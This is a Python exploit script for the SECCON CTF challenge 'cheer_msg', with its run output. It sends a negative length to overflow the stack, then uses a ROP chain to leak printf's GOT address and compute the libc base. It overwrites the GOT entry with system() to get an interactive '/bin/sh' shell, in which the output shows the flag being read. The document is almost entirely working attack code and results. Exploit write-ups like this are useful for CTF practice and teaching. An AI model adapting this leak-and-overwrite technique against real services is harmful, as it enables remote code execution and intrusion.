cheer_msg.py

#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import struct
import telnetlib


def sock(remoteip, remoteport):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((remoteip, remoteport))
    f = s.makefile('rw', bufsize=0)
    return s, f


def read_until(f, delim='\n'):
    data = ''
    while not data.endswith(delim):
        data += f.read(1)
    return data


def p(a):
    return struct.pack("<I", a)


def u(a):
    return struct.unpack("<I", a)[0]


def shell(s):
    t = telnetlib.Telnet()
    t.sock = s
    t.interact()

# libc_printf_offset = 0x49020
# libc_system_offset = 0x3a940
libc_printf_offset = 0x4d410
libc_system_offset = 0x40310



getline_addr = 0x80486bd
popret = 0x8048409
pop2ret = 0x80487ae
printf_plt = 0x8048430
fgets_plt = 0x8048440
printf_got_addr = 0x804a010

# s, f = sock('localhost', 4444)
s, f = sock('cheermsg.pwn.seccon.jp', 30527)
f.write('-144\n')
read_until(f, 'Name >> ')

payload = ''
payload += p(printf_plt)
payload += p(popret)
payload += p(printf_got_addr)
payload += p(getline_addr)
payload += p(pop2ret)
payload += p(printf_got_addr)
payload += p(16)
payload += p(printf_plt)
payload += p(0xdeadbeaf)
payload += p(printf_got_addr+4)
f.write(payload+'\n')

read_until(f, 'Message : \n')
printf_got = u(f.read(4))
libc_base = printf_got - libc_printf_offset
system_addr = libc_base + libc_system_offset
print 'printf_got: {:#x}'.format(printf_got)
print 'libc base: {:#x}'.format(libc_base)
print 'system addr: {:#x}'.format(system_addr)

f.write(p(system_addr) + '/bin/sh\n')
shell(s)

$ python cheer_msg.py
printf_got: 0xf75c1410
libc base: 0xf7574000
system addr: 0xf75b4310
�|]�Vf��`��o_�
ls
cheer_msg
flag.txt
run.sh
cat flag.txt
SECCON{N40.T_15_ju571c3}